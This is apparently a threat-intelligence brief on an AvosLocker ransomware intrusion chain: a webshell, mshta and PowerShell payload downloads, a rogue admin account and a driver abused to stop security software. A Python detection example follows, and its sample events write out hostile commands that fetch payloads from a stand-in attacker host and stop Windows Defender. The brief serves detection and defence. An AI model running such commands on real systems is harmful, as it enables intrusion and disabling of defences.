May 10, 2022

AvosLocker Infection with Abused Driver

Industry: N/A | Level: Tactical | Source: TrendMicro

Trend Micro observed an AvosLocker infection chain deployed within the US that abused a legitimate Windows driver for defense evasion and to disable security defenses. Initial access leveraged a vulnerability in Zoho ManageEngine ServiceDesk Plus (telemetry did not identify the exact CVE used) to upload a webshell. Following command and control activity, mshta.exe was leveraged to execute the attacker’s HTA file, which spawned a PowerShell script. Discovery commands for system information were executed, along with PowerShell downloads of attacker tools including AnyDeskMSI, Mimikatz, Nmap, PDQ Deploy and Netscan, and the creation of an administrator account. A legitimate driver, Aswarpot.sys, was used from a PowerShell script to disable security products by stopping their services. Throughout the attack, the attackers attempted to copy a number of their tools, including Mimikatz and Impacket, but these efforts were blocked. Nmap was used by the attacker to identify hosts vulnerable to Log4j. Lastly, using the deployment tool PDQ, a batch script was launched on multiple hosts in the victim network.

  • Anvilogic Scenario: AvosLocker Infection with Abused Driver
  • Anvilogic Use Cases:
    • Potential Web Shell
    • MSHTA.exe execution
    • Common Reconnaissance Commands
    • Invoke-WebRequest Command
    • MSIExec Install MSI File
    • Create/Add Local/Domain User
    • Service Stop Commands
    • Windows Copy Files
    • Driver as Command Parameter
    • Mimikatz
    • Wscript/Cscript Execution
    • Impacket/Empire’s WMIExec
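As an added illustration of how the use cases above combine into the scenario (example code written for this page, not Anvilogic's or Trend Micro's detection content), the following Python runs a few of the listed use cases as regex rules over constructed Sysmon-style process-creation events and flags a host only when several distinct steps of the chain land on it. Host names, paths and the `attacker.invalid` URL are made up.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style); hosts, paths
# and the attacker.invalid URL are made up to mirror the chain described above.
EVENTS = [
    {"host": "web01", "image": "cmd.exe", "cmdline": "cmd.exe /c whoami & systeminfo"},
    {"host": "web01", "image": "mshta.exe", "cmdline": "mshta.exe http://attacker.invalid/update.hta"},
    {"host": "web01", "image": "powershell.exe",
     "cmdline": "powershell -c Invoke-WebRequest http://attacker.invalid/AnyDeskMSI.msi -OutFile C:\\Temp\\a.msi"},
    {"host": "web01", "image": "net.exe", "cmdline": "net user svc_backup * /add"},
    {"host": "web01", "image": "sc.exe", "cmdline": "sc stop WinDefend"},
    {"host": "web01", "image": "powershell.exe",
     "cmdline": "powershell -File C:\\Temp\\stop.ps1 C:\\Temp\\Aswarpot.sys"},
    {"host": "ws22", "image": "powershell.exe", "cmdline": "powershell Get-ChildItem C:\\Users"},  # benign
    {"host": "ws22", "image": "sc.exe", "cmdline": "sc stop Spooler"},  # benign admin work
]

# (use case, regex on image name, regex on command line), all case-insensitive.
RULES = [
    ("Common Reconnaissance Commands", r"^(cmd|powershell)\.exe$",
     r"\b(whoami|systeminfo|ipconfig|net view)\b"),
    ("MSHTA.exe execution", r"^mshta\.exe$", r"."),
    ("Invoke-WebRequest Command", r"^powershell\.exe$", r"invoke-webrequest|\biwr\b"),
    ("Create/Add Local/Domain User", r"^net1?\.exe$", r"\buser\b.*\s/add\b"),
    ("Service Stop Commands", r"^(sc|net1?)\.exe$", r"\bstop\b"),
    ("Driver as Command Parameter", r".", r"\S+\.sys\b"),
]


def evaluate(events):
    """Map each use case to the indexes of the events that trigger it."""
    hits = {}
    for idx, ev in enumerate(events):
        for name, image_re, cmd_re in RULES:
            if re.search(image_re, ev["image"], re.I) and re.search(cmd_re, ev["cmdline"], re.I):
                hits.setdefault(name, []).append(idx)
    return hits


def flagged_hosts(events, threshold=3):
    """Hosts where at least `threshold` distinct use cases fired. A lone service
    stop or net user is routine admin work; the scenario is several of these
    steps landing on one host, so alert on the combination, not each rule."""
    per_host = {}
    for name, idxs in evaluate(events).items():
        for i in idxs:
            per_host.setdefault(events[i]["host"], set()).add(name)
    return {h: sorted(n) for h, n in per_host.items() if len(n) >= threshold}
```

On the constructed events, `web01` is flagged with six use cases while `ws22`, which only stopped the print spooler, is not.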